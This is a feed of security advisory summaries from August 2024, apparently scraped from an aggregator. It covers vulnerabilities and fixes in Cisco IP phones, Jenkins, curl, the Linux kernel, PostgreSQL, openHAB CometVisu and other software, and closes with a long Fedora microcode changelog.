07.08.2024 19:00:00 | cisco | [CISCO-SA-SPA-HTTP-VULNS-RJZMX2XZ] Cisco Small Business SPA300 Series and SPA500 Series IP Phones Web UI Vulnerabilities (critical)
Multiple vulnerabilities in the web-based management interface of Cisco Small Business SPA300 Series IP Phones and Cisco Small Business SPA500 Series IP Phones could allow an attacker to execute arbitrary commands on the underlying operating system or cause a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has not released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SPA-HTTP-VULNS-RJZMX2XZ

07.08.2024 21:26:59 | maven | [MAVEN:GHSA-8PV9-QH96-9HC6] Jenkins does not perform a permission check in an HTTP endpoint (moderate)
Jenkins 2.470 and earlier, LTS 2.452.3 and earlier does not perform a permission check in an HTTP endpoint. This allows attackers with Overall/Read permission to access other users' "My Views". Attackers with global View/Configure and View/Delete permissions are also able to change other users' "My Views". Jenkins 2.471, LTS 2.452.4, LTS 2.462.1 restricts access to a user's "My Views" to the owning user and administrators.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8PV9-QH96-9HC6

07.08.2024 21:16:38 | maven | [MAVEN:GHSA-H856-FFVV-XVR4] Jenkins Remoting library arbitrary file read vulnerability (critical)
Jenkins uses the Remoting library (typically `agent.jar` or `remoting.jar`) for the communication between controller and agents. This library allows agents to load classes and classloader resources from the controller, so that Java objects sent from the controller (build steps, etc.) can be executed on agents.
In addition to individual class and resource files, Remoting also allows Jenkins plugins to transmit entire jar files to agents using the `Channel#preloadJar` API. As of publication of this advisory, this feature is used by the following plugins distributed by the Jenkins project: bouncycastle API, Groovy, Ivy, TeamConcert.
In Remoting 3256.v88a_f6e922152 and earlier, except 3206.3208.v409508a_675ff and 3248.3250.v3277a_8e88c9b_, included in Jenkins 2.470 and earlier, LTS 2.452.3 and earlier, calls to `Channel#preloadJar` result in the retrieval of files from the controller by the agent using `ClassLoaderProxy#fetchJar`. Additionally, the implementation of `ClassLoaderProxy#fetchJar` invoked on the controller does not restrict paths that agents could request to read from the controller file system.
This allows agent processes, code running on agents, and attackers with Agent/Connect permission to read arbitrary files from the Jenkins controller file system.
The Remoting library in Jenkins 2.471, LTS 2.452.4, LTS 2.462.1 now sends jar file contents with `Channel#preloadJar` requests, the only use case of `ClassLoaderProxy#fetchJar` in agents, so that agents do not need to request jar file contents from controllers anymore.
To retain compatibility with older versions of Remoting in combination with the plugins listed above, `ClassLoaderProxy#fetchJar` is retained and otherwise unused, just deprecated. Its implementation in Jenkins 2.471, LTS 2.452.4, LTS 2.462.1 was changed so that it is now limited to retrieving jar files referenced in the core classloader or any plugin classloader.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H856-FFVV-XVR4

07.08.2024 17:48:26 | curl | [CURL-CVE-2024-6874] macidn punycode buffer overread (low)
libcurl's URL API function [curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycode conversions, to and from IDN. Asking to convert a name that is exactly 256 bytes, libcurl ends up reading outside of a stack based buffer when built to use the *macidn* IDN backend. The conversion function then fills up the provided buffer exactly - but does not null terminate the string. This flaw can lead to stack contents accidentally getting returned as part of the converted string.
https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6874

08.08.2024 02:17:54 | curl | [CURL-CVE-2024-6197] freeing stack buffer in utf8asn1str (medium)
libcurl's ASN1 parser has this `utf8asn1str()` function used for parsing an ASN.1 UTF-8 string. It can detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte local stack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploiting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances.
https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6197

09.08.2024 03:08:54 | ubuntu | [USN-6953-1] Linux kernel (Oracle) vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6953-1

09.08.2024 03:06:04 | ubuntu | [USN-6952-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6952-1

09.08.2024 01:45:31 | ubuntu | [USN-6951-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6951-1

09.08.2024 01:09:14 | ubuntu | [USN-6950-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6950-1

09.08.2024 00:48:24 | ubuntu | [USN-6949-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6949-1

08.08.2024 22:21:44 | ubuntu | [USN-6948-1] Salt vulnerabilities (critical)
Several security issues were fixed in Salt.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6948-1

08.08.2024 05:20:23 | ubuntu | [USN-6947-1] Kerberos vulnerabilities
Kerberos could be made to crash if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6947-1

08.08.2024 22:01:17 | almalinux | [ALSA-2024:5138] httpd security update (important)
httpd security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5138

08.08.2024 03:00:00 | debian | [DSA-5742-1] odoo
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5742-1

08.08.2024 03:00:00 | debian | [DSA-5744-1] thunderbird (critical)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5744-1

08.08.2024 03:00:00 | debian | [DSA-5741-1] chromium (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5741-1

08.08.2024 03:00:00 | debian | [DSA-5743-1] roundcube (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5743-1

08.08.2024 03:00:00 | freebsd | [FREEBSD:48E6D514-5568-11EF-AF48-6CC21735F730] PostgreSQL -- Prevent unauthorized code execution during pg_dump (high)
PostgreSQL project reports: An attacker able to create and drop non-temporary objects could inject SQL code that would be executed by a concurrent pg_dump session with the privileges of the role running pg_dump (which is often a superuser). The attack involves replacing a sequence or similar object with a view or foreign table that will execute malicious code. To prevent this, introduce a new server parameter restrict_nonsystem_relation_kind that can disable expansion of non-builtin views as well as access to foreign tables, and teach pg_dump to set it when available. Note that the attack is prevented only if both pg_dump and the server it is dumping from are new enough to have this fix.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:48E6D514-5568-11EF-AF48-6CC21735F730

08.08.2024 03:00:00 | redhat | [RHSA-2024:5138] httpd security update (important)
The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.
Security Fix(es):
* httpd: Security issues via backend applications whose response headers are malicious or exploitable (CVE-2024-38476)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5138

08.08.2024 20:11:37 | rustsec | [RUSTSEC-2024-0361] CWA-2024-004: Gas mispricing in cosmwasm-vm
Some Wasm operations take significantly more gas than our benchmarks indicated. This can lead to missing the gas target we defined by a factor of ~10x. This means a malicious contract could take 10 times as much time to execute as expected, which can be used to temporarily DoS a chain. For more information, see [CWA-2024-004](https://github.com/CosmWasm/advisories/blob/main/CWAs/CWA-2024-004.md).
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0361

08.08.2024 03:00:00 | redhat | [RHSA-2024:5101] kernel security update (important)
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
* kernel: powerpc: Fix access beyond end of drmem array (CVE-2023-52451)
* kernel: efivarfs: force RO when remounting if SetVariable is not supported (CVE-2023-52463)
* kernel: tracing: Restructure trace_clock_global() to never block (CVE-2021-46939)
* kernel: ext4: avoid online resizing failures due to oversized flex bg (CVE-2023-52622)
* kernel: net/sched: flower: Fix chain template offload (CVE-2024-26669)
* kernel: stmmac: Clear variable when destroying workqueue (CVE-2024-26802)
* kernel: efi: runtime: Fix potential overflow of soft-reserved region size (CVE-2024-26843)
* kernel: quota: Fix potential NULL pointer dereference (CVE-2024-26878)
* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)
* kernel: SUNRPC: fix a memleak in gss_import_v2_context (CVE-2023-52653)
* kernel: dmaengine/idxd: hardware erratum allows potential security problem with direct access by untrusted application (CVE-2024-21823)
* kernel: Revert "net/mlx5: Block entering switchdev mode with ns inconsistency" (CVE-2023-52658)
* kernel: ext4: fix corruption during on-line resize (CVE-2024-35807)
* kernel: x86/fpu: Keep xfd_state in sync with MSR_IA32_XFD (CVE-2024-35801)
* kernel: dyndbg: fix old BUG_ON in >control parser (CVE-2024-35947)
* kernel: net/sched: act_skbmod: prevent kernel-infoleak (CVE-2024-35893)
* kernel: x86/mce: Make sure to grab mce_sysfs_mutex in set_bank() (CVE-2024-35876)
* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)
* kernel: tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING (CVE-2023-52845)
* (CVE-2023-28746)
* (CVE-2023-52847)
* (CVE-2021-47548)
* (CVE-2024-36921)
* (CVE-2024-26921)
* (CVE-2021-47579)
* (CVE-2024-36927)
* (CVE-2024-39276)
* (CVE-2024-33621)
* (CVE-2024-27010)
* (CVE-2024-26960)
* (CVE-2024-38596)
* (CVE-2022-48743)
* (CVE-2024-26733)
* (CVE-2024-26586)
* (CVE-2024-26698)
* (CVE-2023-52619)
Bug Fix(es):
* RHEL8.6 - Spinlock statistics may show negative elapsed time and incorrectly formatted output (JIRA:RHEL-17678)
* [AWS][8.9] There are call traces found when booting debug-kernel for Amazon EC2 r8g.metal-24xl instance (JIRA:RHEL-23841)
* [rhel8] gfs2: Fix glock shrinker (JIRA:RHEL-32941)
* lan78xx: Microchip LAN7800 never comes up after unplug and replug (JIRA:RHEL-33437)
* [Hyper-V][RHEL-8.10.z] Update hv_netvsc driver to TOT (JIRA:RHEL-39074)
* Use-after-free on proc inode-i_sb triggered by fsnotify (JIRA:RHEL-40167)
* blk-cgroup: Properly propagate the iostat update up the hierarchy [rhel-8.10.z] (JIRA:RHEL-40939)
* (JIRA:RHEL-31798)
* (JIRA:RHEL-10263)
* (JIRA:RHEL-40901)
* (JIRA:RHEL-43547)
* (JIRA:RHEL-34876)
Enhancement(s):
* [RFE] Add module parameters 'soft_reboot_cmd' and 'soft_active_on_boot' for customizing softdog configuration (JIRA:RHEL-19723)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5101

08.08.2024 03:00:00 | redhat | [RHSA-2024:5102] kernel-rt security update (important)
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
* kernel: efivarfs: force RO when remounting if SetVariable is not supported (CVE-2023-52463)
* kernel: tracing: Restructure trace_clock_global() to never block (CVE-2021-46939)
* kernel: ext4: avoid online resizing failures due to oversized flex bg (CVE-2023-52622)
* kernel: net/sched: flower: Fix chain template offload (CVE-2024-26669)
* kernel: stmmac: Clear variable when destroying workqueue (CVE-2024-26802)
* kernel: efi: runtime: Fix potential overflow of soft-reserved region size (CVE-2024-26843)
* kernel: quota: Fix potential NULL pointer dereference (CVE-2024-26878)
* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)
* kernel: SUNRPC: fix a memleak in gss_import_v2_context (CVE-2023-52653)
* kernel: dmaengine/idxd: hardware erratum allows potential security problem with direct access by untrusted application (CVE-2024-21823)
* kernel: ext4: fix corruption during on-line resize (CVE-2024-35807)
* kernel: x86/fpu: Keep xfd_state in sync with MSR_IA32_XFD (CVE-2024-35801)
* kernel: dyndbg: fix old BUG_ON in >control parser (CVE-2024-35947)
* kernel: net/sched: act_skbmod: prevent kernel-infoleak (CVE-2024-35893)
* kernel: x86/mce: Make sure to grab mce_sysfs_mutex in set_bank() (CVE-2024-35876)
* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)
* kernel: tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING (CVE-2023-52845)
* kernel: Revert "net/mlx5: Block entering switchdev mode with ns inconsistency" (CVE-2023-52658)
* kernel: crash due to a missing check for leb_size (CVE-2024-25739)
* kernel: tcp: make sure init the accept_queue's spinlocks once (CVE-2024-26614)
* kernel: tcp: add sanity checks to rx zerocopy (CVE-2024-26640)
* kernel: NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102 (CVE-2024-26870)
* kernel: nfs: fix UAF in direct writes (CVE-2024-26958)
* kernel: SUNRPC: fix some memleaks in gssx_dec_option_array (CVE-2024-27388)
* kernel: wifi: iwlwifi: mvm: don't set the MFP flag for the GTK (CVE-2024-27434)
* kernel: of: Fix double free in of_parse_phandle_with_args_map (CVE-2023-52679)
* kernel: scsi: lpfc: Fix possible memory leak in lpfc_rcv_padisc() (CVE-2024-35930)
* kernel: wifi: iwlwifi: mvm: rfi: fix potential response leaks (CVE-2024-35912)
* kernel: block: prevent division by zero in blk_rq_stat_sum() (CVE-2024-35925)
* kernel: wifi: ath11k: decrease MHI channel buffer length to 8KB (CVE-2024-35938)
* kernel: wifi: cfg80211: check A-MSDU format more carefully (CVE-2024-35937)
* kernel: wifi: rtw89: fix null pointer access when abort scan (CVE-2024-35946)
* kernel: netfilter: nf_tables: honor table dormant flag from netdev release event path (CVE-2024-36005)
* kernel: mm/hugetlb: fix missing hugetlb_lock for resv uncharge (CVE-2024-36000)
* kernel: mlxsw: spectrum_acl_tcam: Fix incorrect list API usage (CVE-2024-36006)
* kernel: net: ieee802154: fix null deref in parse dev addr (CVE-2021-47257)
* kernel: mmc: sdio: fix possible resource leaks in some error paths (CVE-2023-52730)
* kernel: wifi: ath11k: fix gtk offload status event locking (CVE-2023-52777)
* (CVE-2023-52832)
* (CVE-2023-52803)
* (CVE-2023-52756)
* (CVE-2023-52834)
* (CVE-2023-52791)
* (CVE-2023-52764)
* (CVE-2021-47468)
* (CVE-2021-47284)
* (CVE-2024-36025)
* (CVE-2024-36941)
* (CVE-2024-36940)
* (CVE-2024-36904)
* (CVE-2024-36896)
* (CVE-2024-36954)
* (CVE-2024-36950)
* (CVE-2024-38575)
* (CVE-2024-36917)
* (CVE-2024-36016)
* (CVE-2023-52762)
* (CVE-2024-27025)
* (CVE-2021-47548)
* (CVE-2023-52619)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5102

08.08.2024 11:54:06 | almalinux | [ALSA-2024:5079] libtiff security update (moderate)
libtiff security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5079

08.08.2024 19:38:01 | npm | [NPM:GHSA-F83W-WQHC-CFP4] Matrix SDK for React's URL preview setting for a room is controllable by the homeserver (moderate)
### Impact
A malicious homeserver could manipulate a user's account data to cause the client to enable URL previews in end-to-end encrypted rooms, in which case any URLs in encrypted messages would be sent to the server. Even if the CVSS score would be 4.1 ([AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N&version=3.1)), the maintainer classifies this as a High severity issue.
### Patches
This was patched in matrix-react-sdk 3.105.1.
### Workarounds
Deployments that trust their homeservers, as well as closed federations of trusted servers, are not affected.
### References
N/A.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F83W-WQHC-CFP4

09.08.2024 21:24:15 | maven | [MAVEN:GHSA-PCWP-26PW-J98W] CometVisu Backend for openHAB has a path traversal vulnerability (moderate)
openHAB's [CometVisuServlet](https://github.com/openhab/openhab-webui/blob/1c03c60f84388b9d7da0231df2d4ebb1e17d3fcf/bundles/org.openhab.ui.cometvisu/src/main/java/org/openhab/ui/cometvisu/internal/servlet/CometVisuServlet.java#L75) is susceptible to an unauthenticated path traversal vulnerability. Local files on the server can be requested via HTTP GET on the CometVisuServlet. This vulnerability was discovered with the help of CodeQL's [Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/java/java-path-injection/) query.
## Impact
This issue may lead to Information Disclosure.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PCWP-26PW-J98W

09.08.2024 21:24:08 | maven | [MAVEN:GHSA-F729-58X4-GQGF] CometVisu Backend for openHAB affected by RCE through path traversal (critical)
CometVisu's file system endpoints don't require authentication and additionally the endpoint to update an existing file is susceptible to path traversal. This makes it possible for an attacker to overwrite existing files on the openHAB instance. If the overwritten file is a shell script that is executed at a later time this vulnerability can allow remote code execution by an attacker. This vulnerability was discovered with the help of CodeQL's [Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/java/java-path-injection/) query.
## Impact
This issue may lead up to Remote Code Execution (RCE).
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F729-58X4-GQGF

09.08.2024 21:21:23 | maven | [MAVEN:GHSA-3G4C-HJHR-73RJ] CometVisu Backend for openHAB has a sensitive information disclosure vulnerability (moderate)
Several endpoints in the CometVisu add-on of openHAB don't require authentication. This makes it possible for unauthenticated attackers to modify or to steal sensitive data.
## Impact
This issue may lead to sensitive Information Disclosure.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3G4C-HJHR-73RJ

09.08.2024 21:21:08 | maven | [MAVEN:GHSA-V7GR-MQPJ-WWH3] CometVisu Backend for openHAB affected by SSRF/XSS (high)
The [proxy endpoint](https://github.com/openhab/openhab-webui/blob/1c03c60f84388b9d7da0231df2d4ebb1e17d3fcf/bundles/org.openhab.ui.cometvisu/src/main/java/org/openhab/ui/cometvisu/internal/backend/rest/ProxyResource.java#L83) of openHAB's CometVisu add-on can be accessed without authentication. This proxy-feature can be exploited as Server-Side Request Forgery (SSRF) to induce GET HTTP requests to internal-only servers, in case openHAB is exposed in a non-private network. Furthermore, this proxy-feature can also be exploited as a Cross-Site Scripting (XSS) vulnerability, as an attacker is able to re-route a request to their server and return a page with malicious JavaScript code. Since the browser receives this data directly from the openHAB CometVisu UI, this JavaScript code will be executed with the origin of the CometVisu UI. This allows an attacker to exploit call endpoints on an openHAB server even if the openHAB server is located in a private network (e.g. by sending an openHAB admin a link that proxies malicious JavaScript). This vulnerability was discovered with the help of CodeQL's [Server-side request forgery](https://codeql.github.com/codeql-query-help/java/java-ssrf/) query.
## Impact
This issue may lead up to Remote Code Execution (RCE) when chained with other vulnerabilities (see: GHSL-2024-007).
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V7GR-MQPJ-WWH3

09.08.2024 16:38:06 | ubuntu | [USN-6926-3] Linux kernel (Azure) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6926-3

10.08.2024 03:00:00 | gentoo | [GLSA-202408-20] libde265: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in libde265, the worst of which could lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-20

10.08.2024 03:00:00 | gentoo | [GLSA-202408-21] GPAC: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in GPAC, the worst of which could lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-21

10.08.2024 03:00:00 | gentoo | [GLSA-202408-23] GnuPG: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in GnuPG, the worst of which could lead to signature spoofing.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-23

10.08.2024 03:00:00 | gentoo | [GLSA-202408-22] Bundler: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in Bundler, the worst of which could lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-22

10.08.2024 03:00:00 | freebsd | [FREEBSD:5776CC4F-5717-11EF-B611-84A93843EB75] Roundcube -- Multiple vulnerabilities (high)
The Roundcube project reports:
- XSS vulnerability in post-processing of sanitized HTML content [CVE-2024-42009]
- XSS vulnerability in serving of attachments other than HTML or SVG [CVE-2024-42008]
- information leak (access to remote content) via insufficient CSS filtering [CVE-2024-42010]
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:5776CC4F-5717-11EF-B611-84A93843EB75

11.08.2024 03:00:00 | gentoo | [GLSA-202408-26] matio: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in matio, the worst of which could lead to arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-26

11.08.2024 03:00:00 | gentoo | [GLSA-202408-24] Ruby on Rails: Remote Code Execution (normal)
A vulnerability has been discovered in Ruby on Rails, which can lead to remote code execution via serialization of data.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-24

11.08.2024 03:00:00 | gentoo | [GLSA-202408-25] runc: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in runc, the worst of which could lead to privilege escalation.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-25

11.08.2024 03:00:00 | gentoo | [GLSA-202408-27] AFLplusplus: Arbitrary Code Execution (normal)
A vulnerability has been discovered in AFLplusplus, which can lead to arbitrary code execution via an untrusted CWD.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-27

11.08.2024 03:00:00 | gentoo | [GLSA-202408-28] rsyslog: Heap Buffer Overflow (normal)
A vulnerability has been discovered in rsyslog, which could possibly lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202408-28

13.08.2024 10:46:09 | fedora | [FEDORA-2024-01a020d192] Fedora 40: python3.6
Security fix for CVE-2024-6345 in the bundled setuptools wheel.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-01a020d192

13.08.2024 10:46:07 | fedora | [FEDORA-2024-4c8a159e6e] Fedora 40: python2.7
Security fix for CVE-2024-6345 in the bundled setuptools wheel.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4c8a159e6e

13.08.2024 10:46:05 | fedora | [FEDORA-2024-4b0d95b102] Fedora 40: pypy
Update to 7.3.16 (https://doc.pypy.org/en/latest/release-v7.3.16.html#changelog). Security fix for CVE-2024-6345.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4b0d95b102

13.08.2024 04:35:40fedora[FEDORA-2024-f3692f8528] Fedora 39: microcode_ctlUpdate to upstream 2.1-43. 20240531Addition of 06-aa-04/0xe6 (MTL-H/U C0) microcode at revision 0x1c;Addition of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) at revision0x4121;Addition of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) at revision0x4121;Addition of 06-ba-08/0xe0 microcode at revision 0x4121;Addition of 06-cf-01/0x87 (EMR-SP A0) microcode at revision 0x21000230;Addition of 06-cf-02/0x87 (EMR-SP A1) microcode (in intel-ucode/06-cf-01) atrevision 0x21000230;Addition of 06-cf-01/0x87 (EMR-SP A0) microcode (in intel-ucode/06-cf-02) atrevision 0x21000230;Addition of 06-cf-02/0x87 (EMR-SP A1) microcode at revision 0x21000230;Removal of 06-8f-04/0x10 microcode at revision 0x2c000290;Removal of 06-8f-04/0x87 (SPR-SP E0/S1) microcode at revision 0x2b0004d0;Removal of 06-8f-05/0x10 (SPR-HBM B1) microcode (in intel-ucode/06-8f-04) atrevision 0x2c000290;Removal of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-04) atrevision 0x2b0004d0;Removal of 06-8f-06/0x10 microcode (in intel-ucode/06-8f-04) at revision0x2c000290;Removal of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-04) atrevision 0x2b0004d0;Update of 06-55-03/0x97 (SKX-SP B1) microcode from revision 0x1000181 up to0x1000191;Update of 06-55-06/0xbf (CLX-SP B0) microcode from revision 0x4003604 up to0x4003605;Update of 06-55-07/0xbf (CLX-SP/W/X B1/L1) microcode from revision 0x5003604 upto 0x5003605;Update of 06-55-0b/0xbf (CPX-SP A1) microcode from revision 0x7002703 up to0x7002802;Update of 06-56-05/0x10 (BDX-NS A0/A1, HWL A1) microcode from revision 0xe000014up to 0xe000015;Update of 06-5f-01/0x01 (DNV B0) microcode from revision 0x38 up to 0x3e;Update of 06-6a-06/0x87 (ICX-SP D0) microcode from revision 0xd0003b9 up to0xd0003d1;Update of 06-6c-01/0x10 (ICL-D B0) microcode from revision 0x1000268 up to0x1000290;Update of 06-7a-01/0x01 (GLK B0) microcode from revision 0x3e up to 0x42;Update of 
06-7a-08/0x01 (GLK-R R0) microcode from revision 0x22 up to 0x24;
Update of 06-7e-05/0x80 (ICL-U/Y D1) microcode from revision 0xc2 up to 0xc4;
Update of 06-8c-01/0x80 (TGL-UP3/UP4 B1) microcode from revision 0xb4 up to 0xb6;
Update of 06-8c-02/0xc2 (TGL-R C0) microcode from revision 0x34 up to 0x36;
Update of 06-8d-01/0xc2 (TGL-H R0) microcode from revision 0x4e up to 0x50;
Update of 06-8e-0c/0x94 (AML-Y 4+2 V0, CML-U 4+2 V0, WHL-U V0) microcode from revision 0xf8 up to 0xfa;
Update of 06-8f-04/0x10 microcode (in intel-ucode/06-8f-05) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-05) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-05/0x10 (SPR-HBM B1) microcode from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-05/0x87 (SPR-SP E2) microcode from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-06/0x10 microcode (in intel-ucode/06-8f-05) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-05) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode (in intel-ucode/06-8f-05) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-08/0x10 (SPR-HBM B3) microcode (in intel-ucode/06-8f-05) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode (in intel-ucode/06-8f-05) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-04/0x10 microcode (in intel-ucode/06-8f-06) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-06) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-05/0x10 (SPR-HBM B1) microcode (in intel-ucode/06-8f-06) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-06) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-06/0x10 microcode from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-06/0x87 (SPR-SP E3) microcode from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode (in intel-ucode/06-8f-06) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-08/0x10 (SPR-HBM B3) microcode (in intel-ucode/06-8f-06) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode (in intel-ucode/06-8f-06) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-07) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-07) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-07) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode (in intel-ucode/06-8f-07) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-04/0x10 microcode (in intel-ucode/06-8f-08) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-04/0x87 (SPR-SP E0/S1) microcode (in intel-ucode/06-8f-08) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-05/0x10 (SPR-HBM B1) microcode (in intel-ucode/06-8f-08) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-05/0x87 (SPR-SP E2) microcode (in intel-ucode/06-8f-08) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-06/0x10 microcode (in intel-ucode/06-8f-08) from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-06/0x87 (SPR-SP E3) microcode (in intel-ucode/06-8f-08) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-07/0x87 (SPR-SP E4/S2) microcode (in intel-ucode/06-8f-08) from revision 0x2b0004d0 up to 0x2b0005c0;
Update of 06-8f-08/0x10 (SPR-HBM B3) microcode from revision 0x2c000290 up to 0x2c000390;
Update of 06-8f-08/0x87 (SPR-SP E5/S3) microcode from revision 0x2b0004d0 up to 0x2b0005c0;
